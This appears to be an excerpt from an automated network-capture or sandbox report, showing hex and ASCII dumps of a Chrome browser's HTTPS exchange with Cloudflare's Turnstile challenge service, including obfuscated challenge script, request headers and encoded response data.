                                        Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.qqQL2={"metadata":{"challenge.privacy_link":"https%3A%2F%2Fwww.cloudflare.com%2Fprivacypolicy%2F","challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcep
                                        2025-01-07 21:06:01 UTC1369INData Raw: 33 45 72 65 66 72 65 73 68 25 32 30 74 68 65 25 32 30 70 61 67 65 25 33 43 25 32 46 61 25 33 45 25 32 30 69 66 25 32 30 74 68 65 25 32 30 69 73 73 75 65 25 32 30 70 65 72 73 69 73 74 73 2e 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 66 6f 6f 74 65 72 5f 70 72 69 76 61 63 79 22 3a 22 50 72 69 76 61 63 79 22 2c 22 68 75 6d 61 6e 5f 62 75 74 74 6f 6e 5f 74 65 78 74 22 3a 22 56 65 72 69 66 79 25 32 30 79 6f 75 25 32 30 61 72 65 25 32 30 68 75 6d 61 6e 22 2c 22 74 65 73 74 69 6e 67 5f 6f 6e 6c 79 5f 61 6c 77 61 79 73 5f 70 61 73 73 22 3a 22 54 65 73 74 69 6e 67 25 32 30 6f 6e 6c 79 25 32 43 25 32 30 61 6c 77 61 79 73 25 32 30 70 61 73 73 2e 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 66 6f 6f 74 65 72 5f 74 65 72 6d 73 22 3a 22 54 65 72 6d 73 22 2c 22 74 75 72 6e 73 74
                                        Data Ascii: 3Erefresh%20the%20page%3C%2Fa%3E%20if%20the%20issue%20persists.","turnstile_footer_privacy":"Privacy","human_button_text":"Verify%20you%20are%20human","testing_only_always_pass":"Testing%20only%2C%20always%20pass.","turnstile_footer_terms":"Terms","turnst
                                        2025-01-07 21:06:01 UTC1369INData Raw: 67 69 2c 67 6d 2c 67 6e 2c 67 6f 2c 67 73 2c 67 74 2c 67 41 2c 67 45 2c 65 50 2c 65 51 29 7b 66 6f 72 28 67 4a 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 2c 67 49 2c 65 2c 66 29 7b 66 6f 72 28 67 49 3d 62 2c 65 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 66 3d 2d 70 61 72 73 65 49 6e 74 28 67 49 28 39 36 30 29 29 2f 31 2a 28 70 61 72 73 65 49 6e 74 28 67 49 28 38 30 34 29 29 2f 32 29 2b 70 61 72 73 65 49 6e 74 28 67 49 28 31 36 36 39 29 29 2f 33 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 36 39 38 29 29 2f 34 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 36 39 39 29 29 2f 35 2b 70 61 72 73 65 49 6e 74 28 67 49 28 38 34 35 29 29 2f 36 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 32 32 30 29 29 2f 37 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28
                                        Data Ascii: gi,gm,gn,go,gs,gt,gA,gE,eP,eQ){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=-parseInt(gI(960))/1*(parseInt(gI(804))/2)+parseInt(gI(1669))/3+-parseInt(gI(698))/4+-parseInt(gI(1699))/5+parseInt(gI(845))/6*(-parseInt(gI(1220))/7)+-parseInt(gI(
                                        2025-01-07 21:06:01 UTC1369INData Raw: 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2a 69 7d 2c 27 55 45 78 75 56 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 3d 3d 68 7d 2c 27 4f 4b 79 67 48 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3e 69 7d 2c 27 50 7a 45 4f 41 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 21 3d 69 7d 2c 27 58 47 4f 6b 4c 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 3d 3d 68 7d 2c 27 49 76 42 46 74 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 47 4b 4f 47 61 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2d 69 7d 2c 27 6f 59 72 47 78 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69
                                        Data Ascii: :function(h,i){return h*i},'UExuV':function(h,i){return i==h},'OKygH':function(h,i){return h>i},'PzEOA':function(h,i){return h!=i},'XGOkL':function(h,i){return i==h},'IvBFt':function(h,i){return h(i)},'GKOGa':function(h,i){return h-i},'oYrGx':function(h,i
                                        2025-01-07 21:06:01 UTC1369INData Raw: 38 32 29 5d 3d 6a 2c 44 5b 67 50 28 31 31 33 35 29 5d 5b 67 50 28 35 39 33 29 5d 3d 67 50 28 31 35 33 36 29 3b 65 6c 73 65 7b 66 6f 72 28 78 3d 30 3b 78 3c 47 3b 49 3c 3c 3d 31 2c 4a 3d 3d 64 5b 67 50 28 34 39 30 29 5d 28 6a 2c 31 29 3f 28 4a 3d 30 2c 48 5b 67 50 28 39 33 32 29 5d 28 6f 28 49 29 29 2c 49 3d 30 29 3a 4a 2b 2b 2c 78 2b 2b 29 3b 66 6f 72 28 4e 3d 44 5b 67 50 28 31 31 38 37 29 5d 28 30 29 2c 78 3d 30 3b 38 3e 78 3b 49 3d 64 5b 67 50 28 36 34 33 29 5d 28 49 2c 31 29 7c 64 5b 67 50 28 31 36 38 30 29 5d 28 4e 2c 31 29 2c 4a 3d 3d 64 5b 67 50 28 34 39 30 29 5d 28 6a 2c 31 29 3f 28 4a 3d 30 2c 48 5b 67 50 28 39 33 32 29 5d 28 64 5b 67 50 28 38 31 39 29 5d 28 6f 2c 49 29 29 2c 49 3d 30 29 3a 4a 2b 2b 2c 4e 3e 3e 3d 31 2c 78 2b 2b 29 3b 7d 7d 65 6c
                                        Data Ascii: 82)]=j,D[gP(1135)][gP(593)]=gP(1536);else{for(x=0;x<G;I<<=1,J==d[gP(490)](j,1)?(J=0,H[gP(932)](o(I)),I=0):J++,x++);for(N=D[gP(1187)](0),x=0;8>x;I=d[gP(643)](I,1)|d[gP(1680)](N,1),J==d[gP(490)](j,1)?(J=0,H[gP(932)](d[gP(819)](o,I)),I=0):J++,N>>=1,x++);}}el
                                        2025-01-07 21:06:01 UTC1369INData Raw: 52 3d 62 67 28 62 68 2c 73 5b 67 50 28 38 37 30 29 5d 28 62 6c 26 62 6b 5e 62 69 26 62 6a 2c 73 5b 67 50 28 39 38 38 29 5d 28 62 6d 2c 62 6e 29 29 29 2c 62 6f 3d 62 70 2c 62 71 3d 62 72 2c 62 73 3d 62 74 2c 62 75 3d 62 76 28 62 77 2c 51 29 2c 62 78 3d 62 79 2c 62 7a 3d 62 41 2c 62 42 3d 62 43 2c 62 45 28 51 2c 52 29 29 7d 7d 65 6c 73 65 20 48 5b 67 50 28 36 34 34 29 5d 28 64 5b 67 50 28 31 30 37 39 29 5d 2c 66 75 6e 63 74 69 6f 6e 28 67 51 29 7b 67 51 3d 67 50 2c 69 5b 67 51 28 31 31 33 35 29 5d 5b 67 51 28 39 38 32 29 5d 3d 67 51 28 31 33 37 37 29 2c 6a 28 67 51 28 31 34 34 36 29 2c 73 5b 67 51 28 31 36 38 35 29 5d 29 7d 29 3b 69 66 28 44 21 3d 3d 27 27 29 7b 69 66 28 4f 62 6a 65 63 74 5b 67 50 28 31 36 36 34 29 5d 5b 67 50 28 31 35 34 32 29 5d 5b 67 50
                                        Data Ascii: R=bg(bh,s[gP(870)](bl&bk^bi&bj,s[gP(988)](bm,bn))),bo=bp,bq=br,bs=bt,bu=bv(bw,Q),bx=by,bz=bA,bB=bC,bE(Q,R))}}else H[gP(644)](d[gP(1079)],function(gQ){gQ=gP,i[gQ(1135)][gQ(982)]=gQ(1377),j(gQ(1446),s[gQ(1685)])});if(D!==''){if(Object[gP(1664)][gP(1542)][gP
                                        2025-01-07 21:06:01 UTC1369INData Raw: 7b 69 66 28 67 53 3d 67 52 2c 6c 3d 7b 7d 2c 6c 5b 67 53 28 36 38 34 29 5d 3d 67 53 28 36 35 31 29 2c 6c 5b 67 53 28 35 36 31 29 5d 3d 67 53 28 31 33 32 36 29 2c 6d 3d 6c 2c 67 53 28 34 30 35 29 3d 3d 3d 6a 5b 67 53 28 31 31 33 33 29 5d 29 72 65 74 75 72 6e 20 68 5b 67 53 28 31 31 38 37 29 5d 28 6b 29 3b 65 6c 73 65 20 66 5b 6d 5b 67 53 28 36 38 34 29 5d 5d 26 26 28 6f 3d 7b 7d 2c 6f 5b 67 53 28 31 33 37 31 29 5d 3d 67 53 28 31 33 39 34 29 2c 6f 5b 67 53 28 35 38 31 29 5d 3d 6a 5b 67 53 28 36 30 34 29 5d 5b 67 53 28 31 33 35 30 29 5d 2c 6f 5b 67 53 28 38 32 37 29 5d 3d 6d 5b 67 53 28 35 36 31 29 5d 2c 69 5b 67 53 28 36 35 31 29 5d 5b 67 53 28 39 39 36 29 5d 28 6f 2c 27 2a 27 29 29 7d 29 7d 2c 27 69 27 3a 66 75 6e 63 74 69 6f 6e 28 69 2c 6a 2c 6f 2c 67 54
                                        Data Ascii: {if(gS=gR,l={},l[gS(684)]=gS(651),l[gS(561)]=gS(1326),m=l,gS(405)===j[gS(1133)])return h[gS(1187)](k);else f[m[gS(684)]]&&(o={},o[gS(1371)]=gS(1394),o[gS(581)]=j[gS(604)][gS(1350)],o[gS(827)]=m[gS(561)],i[gS(651)][gS(996)](o,'*'))})},'i':function(i,j,o,gT
                                        2025-01-07 21:06:01 UTC1369INData Raw: 44 5b 67 54 28 31 36 36 35 29 5d 28 27 27 29 7d 69 66 28 64 5b 67 54 28 31 31 31 37 29 5d 28 30 2c 78 29 26 26 28 78 3d 4d 61 74 68 5b 67 54 28 38 36 31 29 5d 28 32 2c 43 29 2c 43 2b 2b 29 2c 73 5b 4d 5d 29 4d 3d 73 5b 4d 5d 3b 65 6c 73 65 20 69 66 28 64 5b 67 54 28 34 36 36 29 5d 28 4d 2c 42 29 29 4d 3d 45 2b 45 5b 67 54 28 39 38 33 29 5d 28 30 29 3b 65 6c 73 65 20 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 44 5b 67 54 28 39 33 32 29 5d 28 4d 29 2c 73 5b 42 2b 2b 5d 3d 45 2b 4d 5b 67 54 28 39 38 33 29 5d 28 30 29 2c 78 2d 2d 2c 45 3d 4d 2c 64 5b 67 54 28 31 33 39 35 29 5d 28 30 2c 78 29 26 26 28 78 3d 4d 61 74 68 5b 67 54 28 38 36 31 29 5d 28 32 2c 43 29 2c 43 2b 2b 29 7d 7d 7d 2c 67 3d 7b 7d 2c 67 5b 67 4b 28 37 31 33 29 5d 3d 66 2e 68 2c 67 7d 28 29 2c 65 50
                                        Data Ascii: D[gT(1665)]('')}if(d[gT(1117)](0,x)&&(x=Math[gT(861)](2,C),C++),s[M])M=s[M];else if(d[gT(466)](M,B))M=E+E[gT(983)](0);else return null;D[gT(932)](M),s[B++]=E+M[gT(983)](0),x--,E=M,d[gT(1395)](0,x)&&(x=Math[gT(861)](2,C),C++)}}},g={},g[gK(713)]=f.h,g}(),eP
                                        2025-01-07 21:06:01 UTC1369INData Raw: 6f 72 29 3f 67 5b 68 71 28 31 30 37 30 29 5d 3d 4a 53 4f 4e 5b 68 71 28 31 35 33 32 29 5d 28 67 5b 68 71 28 31 30 37 30 29 5d 2c 4f 62 6a 65 63 74 5b 68 71 28 31 30 39 35 29 5d 28 67 5b 68 71 28 31 30 37 30 29 5d 29 29 3a 67 5b 68 71 28 31 30 37 30 29 5d 3d 4a 53 4f 4e 5b 68 71 28 31 35 33 32 29 5d 28 67 5b 68 71 28 31 30 37 30 29 5d 29 2c 6d 3d 6b 5b 68 71 28 35 33 32 29 5d 28 69 2c 68 71 28 38 35 31 29 29 2c 6e 3d 65 4d 5b 68 71 28 36 30 34 29 5d 5b 68 71 28 39 38 31 29 5d 3f 6b 5b 68 71 28 31 35 37 33 29 5d 28 27 68 2f 27 2c 65 4d 5b 68 71 28 36 30 34 29 5d 5b 68 71 28 39 38 31 29 5d 29 2b 27 2f 27 3a 27 27 2c 6f 3d 6b 5b 68 71 28 36 33 35 29 5d 28 6b 5b 68 71 28 31 32 37 38 29 5d 28 6b 5b 68 71 28 31 30 33 34 29 5d 28 6b 5b 68 71 28 31 30 33 34 29 5d
                                        Data Ascii: or)?g[hq(1070)]=JSON[hq(1532)](g[hq(1070)],Object[hq(1095)](g[hq(1070)])):g[hq(1070)]=JSON[hq(1532)](g[hq(1070)]),m=k[hq(532)](i,hq(851)),n=eM[hq(604)][hq(981)]?k[hq(1573)]('h/',eM[hq(604)][hq(981)])+'/':'',o=k[hq(635)](k[hq(1278)](k[hq(1034)](k[hq(1034)]
                                        2025-01-07 21:06:01 UTC1369INData Raw: 21 5b 5d 3b 29 7b 73 77 69 74 63 68 28 73 5b 76 2b 2b 5d 29 7b 63 61 73 65 27 30 27 3a 4d 5b 68 72 28 31 30 37 32 29 5d 5b 68 72 28 35 39 31 29 5d 28 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 31 27 3a 4a 5b 68 72 28 31 30 37 32 29 5d 5b 68 72 28 31 33 30 39 29 5d 28 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 32 27 3a 4c 5b 68 72 28 31 30 37 32 29 5d 5b 68 72 28 34 32 33 29 5d 28 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 33 27 3a 4f 5b 68 72 28 31 30 37 32 29 5d 5b 68 72 28 31 33 38 39 29 5d 28 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 34 27 3a 4b 5b 68 72 28 31 30 37 32 29 5d 5b 68 72 28 35 39 37 29 5d 28 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 35 27 3a 65 5b 68 72 28 31 35 30 30 29 5d 28 4e 29 3b 63 6f 6e 74 69 6e 75 65 7d
                                        Data Ascii: ![];){switch(s[v++]){case'0':M[hr(1072)][hr(591)]();continue;case'1':J[hr(1072)][hr(1309)]();continue;case'2':L[hr(1072)][hr(423)]();continue;case'3':O[hr(1072)][hr(1389)]();continue;case'4':K[hr(1072)][hr(597)]();continue;case'5':e[hr(1500)](N);continue}


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        19192.168.2.449774104.18.94.414435480C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-01-07 21:06:01 UTC1171OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/442655786:1736281748:kg17Jh4QwkIjazyMgCUACxDcKqgDYMNi1u3JYjXPALY/8fe6e8bcbdc57d11/Gt25uDESdAvJ6jww.JeJp3K3qkyx5r7rWJW3NwOWfhg-1736283959-1.1.1.1-zHBdodP33CmwVXOzXIJxOYl7ZcK_vAAcBoIVDvmo4Qzxc5eyAvqOG3Ale2tpAPnN HTTP/1.1
                                        Host: challenges.cloudflare.com
                                        Connection: keep-alive
                                        Content-Length: 3939
                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                        Content-type: application/x-www-form-urlencoded
                                        CF-Chl-RetryAttempt: 0
                                        sec-ch-ua-mobile: ?0
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        CF-Challenge: Gt25uDESdAvJ6jww.JeJp3K3qkyx5r7rWJW3NwOWfhg-1736283959-1.1.1.1-zHBdodP33CmwVXOzXIJxOYl7ZcK_vAAcBoIVDvmo4Qzxc5eyAvqOG3Ale2tpAPnN
                                        sec-ch-ua-platform: "Windows"
                                        Accept: */*
                                        Origin: https://challenges.cloudflare.com
                                        Sec-Fetch-Site: same-origin
                                        Sec-Fetch-Mode: cors
                                        Sec-Fetch-Dest: empty
                                        Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/q622a/0x4AAAAAAAAjq6WYeRDKmebM/light/fbE/normal/auto/
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2025-01-07 21:06:01 UTC3939OUTData Raw: 76 5f 38 66 65 36 65 38 62 63 62 64 63 35 37 64 31 31 3d 67 4c 77 31 32 31 4e 31 2d 31 4a 31 35 78 30 75 78 30 63 31 78 71 74 68 38 69 78 45 30 38 55 49 30 56 63 30 50 79 70 50 75 6c 38 30 74 71 38 68 6b 70 6c 4e 30 63 30 77 71 78 6d 50 53 30 48 70 30 68 6b 46 6d 31 45 6b 30 33 31 78 6b 6d 78 72 47 34 50 6d 30 4b 31 47 47 37 30 42 70 30 2d 42 30 77 71 50 56 30 38 72 63 52 46 77 4f 39 41 24 30 38 30 78 6f 4e 30 6c 71 78 61 4c 31 6c 24 24 6b 30 67 32 43 65 52 62 6b 69 6d 43 4f 43 6a 64 65 34 61 48 70 50 59 72 72 6d 52 6d 6b 48 30 25 32 62 2b 72 36 50 5a 72 67 64 66 31 75 78 35 55 4c 30 47 53 52 74 49 77 70 24 71 6a 63 48 2b 67 45 30 74 32 72 68 70 30 67 78 47 6d 68 30 74 6d 64 6c 70 50 65 30 45 47 30 64 63 68 33 38 66 30 30 78 70 50 41 39 58 44 52 30 45 2d
                                        Data Ascii: v_8fe6e8bcbdc57d11=gLw121N1-1J15x0ux0c1xqth8ixE08UI0Vc0PypPul80tq8hkplN0c0wqxmPS0Hp0hkFm1Ek031xkmxrG4Pm0K1GG70Bp0-B0wqPV08rcRFwO9A$080xoN0lqxaL1l$$k0g2CeRbkimCOCjde4aHpPYrrmRmkH0%2b+r6PZrgdf1ux5UL0GSRtIwp$qjcH+gE0t2rhp0gxGmh0tmdlpPe0EG0dch38f00xpPA9XDR0E-
                                        2025-01-07 21:06:01 UTC791INHTTP/1.1 200 OK
                                        Date: Tue, 07 Jan 2025 21:06:01 GMT
                                        Content-Type: text/plain; charset=UTF-8
                                        Content-Length: 155712
                                        Connection: close
                                        cf-chl-gen: DF0qb58QlNocMZnxT8ZSHsgtN8gFmEMzy0jSGGuAgl9eXUBeuPZ7xG4Vsj44bqBdFStWLFSzzwe9t0tRDdkxzKuk+JftidT/oJY2/tJYXYZ4oAj/vto4YuoKWQwRc6jy1rFx7gLsgwlxzfed31OFqW1SmLEhAghvyKzu0k0pW1CaE948bquCa8etmQ5kuyyBXMeW2mdQm/aMWSxnFagkNBT+SakDwIRDhljf0bjmF9B6Jbsm1BtS+P9fdVSfPD+DgyEWXJFLGCm8H28ABE0Zmjcn9qxqMJCMisZUr5tozEvKHeiIl1yoDrwpzp4tBuvfi+6KYe6d624nPobCUWGqgDlMhtaCDziPp2TqveUMs1ox4ztH0S+FihrlGsVOmY+yqDYwdS6T0EI5kfHDPj4pQ3nn6LvQlvc+GAW548dDGHTWsBJrBWMXu96tX24ZLgdgnDLHe3y+R0QAjFfY2BzueSIJ8cBOYAIRxYxdmblLxecE8cIl271vPj8mQHtCo/+T/+dvb2zplHdkjdKoBLuQbWzq4iQ=$Glz1OZRdb6yqV4x0
                                        Server: cloudflare
                                        CF-RAY: 8fe6e8c8ca20424d-EWR
                                        alt-svc: h3=":443"; ma=86400
                                        2025-01-07 21:06:01 UTC578INData Raw: 69 6e 68 74 62 4a 57 50 61 59 39 39 6c 4a 4e 33 66 58 53 44 6b 58 31 77 59 35 78 38 71 34 52 73 6e 6f 4e 76 67 70 2b 55 5a 71 65 73 64 37 47 6e 68 34 4e 32 6c 6f 36 74 77 62 6d 4b 73 49 4f 69 77 6f 62 4a 73 35 4b 71 70 36 50 4b 78 37 7a 53 6f 5a 37 4c 78 4b 4c 49 79 38 53 31 74 71 53 57 7a 70 6e 68 34 4e 6a 41 31 72 69 78 77 4c 43 34 74 72 50 57 74 37 6a 75 32 4c 44 63 76 63 50 55 31 73 6a 34 32 74 72 4d 2f 4e 6a 76 75 4d 72 5a 38 72 37 75 78 4f 38 49 31 2b 50 32 36 38 54 47 2b 4e 34 41 33 4f 6e 68 7a 77 58 4e 30 78 6e 78 44 66 73 64 39 52 44 62 41 74 34 53 42 51 4d 43 45 2b 54 39 42 4e 77 49 4a 4f 55 46 4c 43 63 75 2f 4f 30 6b 38 67 6b 69 39 52 49 75 39 79 30 62 4d 54 63 73 4c 7a 63 41 50 52 49 63 46 43 68 47 53 79 4d 4a 50 6b 70 47 52 53 67 65 44 30 4d
                                        Data Ascii: inhtbJWPaY99lJN3fXSDkX1wY5x8q4RsnoNvgp+UZqesd7Gnh4N2lo6twbmKsIOiwobJs5Kqp6PKx7zSoZ7LxKLIy8S1tqSWzpnh4NjA1rixwLC4trPWt7ju2LDcvcPU1sj42trM/NjvuMrZ8r7uxO8I1+P268TG+N4A3OnhzwXN0xnxDfsd9RDbAt4SBQMCE+T9BNwIJOUFLCcu/O0k8gki9RIu9y0bMTcsLzcAPRIcFChGSyMJPkpGRSgeD0M
                                        2025-01-07 21:06:01 UTC1369INData Raw: 49 62 49 69 6c 41 47 79 38 70 43 53 6b 7a 4d 79 4d 6c 51 44 6b 76 4f 46 6f 30 57 68 30 74 4b 44 6c 51 51 69 77 67 56 6d 4d 78 52 47 51 33 51 7a 55 72 5a 6c 6c 49 4d 56 39 6f 53 6e 5a 79 4d 31 70 6a 5a 54 4d 39 64 31 52 39 56 6b 31 69 50 48 35 2f 56 6a 35 66 65 30 6c 44 57 55 6d 42 53 32 64 66 68 6f 35 48 6a 47 61 49 61 57 36 44 6c 5a 5a 72 65 59 74 36 63 6e 61 50 66 70 4e 33 65 71 65 72 6c 57 6d 67 5a 61 6d 44 6e 48 78 7a 61 71 79 72 69 71 32 42 6b 35 47 6c 70 37 53 77 6f 62 61 30 6f 49 50 43 75 70 71 2b 6e 4c 75 73 68 4d 61 45 71 36 7a 4f 76 70 50 4c 6a 62 36 6c 6c 63 4f 57 31 4a 4f 57 72 36 32 35 71 74 75 33 35 64 47 69 35 72 69 2f 34 71 66 48 74 63 72 47 75 72 6e 43 71 73 47 6e 39 38 4c 33 79 39 44 30 73 75 33 4c 33 4e 37 2b 2f 4e 54 4d 39 66 58 67 76
                                        Data Ascii: IbIilAGy8pCSkzMyMlQDkvOFo0Wh0tKDlQQiwgVmMxRGQ3QzUrZllIMV9oSnZyM1pjZTM9d1R9Vk1iPH5/Vj5fe0lDWUmBS2dfho5HjGaIaW6DlZZreYt6cnaPfpN3eqerlWmgZamDnHxzaqyriq2Bk5Glp7Swoba0oIPCupq+nLushMaEq6zOvpPLjb6llcOW1JOWr625qtu35dGi5ri/4qfHtcrGurnCqsGn98L3y9D0su3L3N7+/NTM9fXgv
                                        2025-01-07 21:06:01 UTC1369INData Raw: 4d 52 44 38 74 52 7a 35 41 4d 54 55 77 52 6a 55 54 46 30 6f 35 46 31 51 64 48 42 70 64 58 6b 64 6c 50 31 35 57 5a 56 67 39 52 57 55 6e 4c 6d 56 67 50 58 52 71 53 57 56 34 57 44 78 79 65 6d 74 77 55 47 42 72 66 32 39 36 55 59 43 45 57 57 56 34 53 46 71 50 57 47 64 68 6b 32 75 4a 59 57 69 52 65 58 47 58 64 46 61 51 56 34 35 38 64 57 47 41 6c 71 65 55 68 49 70 6d 61 71 79 74 70 36 75 48 63 49 53 41 71 32 75 47 62 6f 56 78 69 70 61 52 76 49 2b 5a 67 48 32 56 6e 4b 2b 42 6d 5a 2b 7a 68 5a 32 69 6e 5a 6a 4e 72 71 72 4d 72 4c 7a 50 30 70 44 53 6f 38 66 53 79 5a 62 52 32 4a 7a 56 32 4a 75 31 30 64 71 59 30 36 48 4a 70 4e 57 6e 75 2b 79 72 38 64 43 75 34 65 62 44 38 64 54 41 79 2f 44 4e 7a 76 44 4d 37 72 79 2f 77 4c 72 4e 7a 64 4c 53 33 75 66 36 39 65 62 32 2b 63
                                        Data Ascii: MRD8tRz5AMTUwRjUTF0o5F1QdHBpdXkdlP15WZVg9RWUnLmVgPXRqSWV4WDxyemtwUGBrf296UYCEWWV4SFqPWGdhk2uJYWiReXGXdFaQV458dWGAlqeUhIpmaqytp6uHcISAq2uGboVxipaRvI+ZgH2VnK+BmZ+zhZ2inZjNrqrMrLzP0pDSo8fSyZbR2JzV2Ju10dqY06HJpNWnu+yr8dCu4ebD8dTAy/DNzvDM7ry/wLrNzdLS3uf69eb2+c
                                        2025-01-07 21:06:01 UTC1369INData Raw: 45 68 45 52 47 44 42 58 4e 6c 52 62 4f 6b 45 30 57 42 74 51 4e 79 5a 57 52 44 70 57 4a 31 6f 2f 56 30 42 51 52 56 78 71 56 45 6b 2f 62 6c 68 4d 4c 54 64 52 63 6e 70 75 4d 7a 35 4f 62 47 42 6b 55 46 79 47 68 34 74 43 56 6b 31 6f 58 34 36 52 5a 6d 61 52 55 55 32 57 6a 33 69 51 57 34 35 32 66 6e 79 51 65 57 39 63 68 58 46 2f 5a 6e 4a 36 6c 36 42 38 6e 49 32 73 71 4c 4a 37 72 34 32 73 74 49 57 43 72 35 53 4d 75 70 46 35 66 4b 79 41 77 38 43 56 6f 72 32 63 71 63 72 45 6c 37 6a 48 78 36 2b 62 30 4d 69 4f 76 63 6a 44 6c 36 66 4c 6c 70 57 79 32 71 33 54 76 4c 76 45 6f 74 2f 57 33 63 69 68 34 39 69 6e 77 39 66 42 32 4f 7a 4d 30 39 44 64 7a 4d 62 6f 32 50 6e 37 36 66 4c 4f 75 38 6e 62 38 50 76 31 37 51 48 63 77 51 45 4d 42 76 66 67 42 41 38 48 32 63 2f 76 39 65 4c
                                        Data Ascii: EhERGDBXNlRbOkE0WBtQNyZWRDpWJ1o/V0BQRVxqVEk/blhMLTdRcnpuMz5ObGBkUFyGh4tCVk1oX46RZmaRUU2Wj3iQW452fnyQeW9chXF/ZnJ6l6B8nI2sqLJ7r42stIWCr5SMupF5fKyAw8CVor2cqcrEl7jHx6+b0MiOvcjDl6fLlpWy2q3TvLvEot/W3cih49inw9fB2OzM09DdzMbo2Pn76fLOu8nb8Pv17QHcwQEMBvfgBA8H2c/v9eL
                                        2025-01-07 21:06:01 UTC1369INData Raw: 78 70 54 55 56 63 77 51 56 59 67 4d 46 4a 62 4a 55 74 48 56 43 6c 4c 55 47 42 6d 54 31 52 63 61 57 6c 67 59 45 5a 35 63 56 74 61 56 33 56 77 4f 6e 4a 4f 59 6a 35 31 67 48 75 41 61 46 4f 42 62 45 74 6f 62 57 4a 6f 63 6f 5a 6d 59 34 32 41 64 34 70 6d 65 6c 61 4f 63 48 78 76 6b 59 32 63 6b 58 53 44 70 32 6d 54 66 36 74 6d 72 6e 35 69 61 4b 47 50 69 4c 4f 31 67 49 79 45 6f 35 53 74 71 4c 35 33 65 36 4b 67 74 4c 79 2b 76 35 36 54 6c 36 4f 35 72 62 75 37 70 4a 75 65 73 4a 79 54 78 64 47 6b 74 73 71 6e 75 62 32 62 32 4d 75 70 6c 38 44 4c 33 4c 6e 61 73 65 48 59 73 75 4c 48 32 63 54 72 33 76 48 6d 71 37 7a 51 79 62 58 4c 35 39 50 61 75 64 65 38 2b 64 36 34 2b 4e 6e 78 31 77 54 57 33 39 6a 61 2b 73 4d 45 77 4f 30 44 38 67 50 69 42 78 55 49 34 73 6f 4e 48 41 37 58
                                        Data Ascii: xpTUVcwQVYgMFJbJUtHVClLUGBmT1RcaWlgYEZ5cVtaV3VwOnJOYj51gHuAaFOBbEtobWJocoZmY42Ad4pmelaOcHxvkY2ckXSDp2mTf6tmrn5iaKGPiLO1gIyEo5StqL53e6KgtLy+v56Tl6O5rbu7pJuesJyTxdGktsqnub2b2Mupl8DL3LnaseHYsuLH2cTr3vHmq7zQybXL59Paude8+d64+Nnx1wTW39ja+sMEwO0D8gPiBxUI4soNHA7X
                                        2025-01-07 21:06:01 UTC1369INData Raw: 49 77 48 6c 34 33 52 55 5a 6a 53 30 70 69 4e 79 78 41 55 6b 5a 47 50 30 39 42 4e 6b 4a 59 55 31 42 49 4f 46 6b 39 58 30 35 30 55 31 31 45 55 46 56 6d 52 33 79 45 68 57 79 4a 6a 45 31 52 6a 55 61 53 63 34 68 34 63 32 36 47 5a 35 64 71 66 49 6d 4a 69 6c 2b 64 65 4a 36 58 6f 4b 47 49 61 61 68 33 72 32 31 6f 70 59 61 62 66 4a 4b 6b 67 72 53 51 63 37 4b 62 6c 5a 32 33 6a 35 71 33 69 35 57 63 72 70 72 41 6d 36 57 56 7a 4d 32 6c 30 4a 32 36 76 63 69 6e 77 36 36 6f 73 5a 6a 4d 71 64 6e 57 7a 72 57 32 7a 61 71 68 75 39 54 59 70 72 65 37 74 65 69 69 35 63 65 6f 78 4e 76 48 70 65 50 73 39 75 48 6f 37 2b 72 4a 78 74 44 6f 36 4e 44 53 32 2b 48 39 2b 2b 44 54 38 38 45 4b 41 64 6f 50 2f 4d 62 73 78 78 54 4c 2f 75 4c 66 41 50 41 49 44 2b 54 58 31 64 62 31 2b 41 4d 43 45
                                        Data Ascii: IwHl43RUZjS0piNyxAUkZGP09BNkJYU1BIOFk9X050U11EUFVmR3yEhWyJjE1RjUaSc4h4c26GZ5dqfImJil+deJ6XoKGIaah3r21opYabfJKkgrSQc7KblZ23j5q3i5WcrprAm6WVzM2l0J26vcinw66osZjMqdnWzrW2zaqhu9TYpre7teii5ceoxNvHpePs9uHo7+rJxtDo6NDS2+H9++DT88EKAdoP/MbsxxTL/uLfAPAID+TX1db1+AMCE
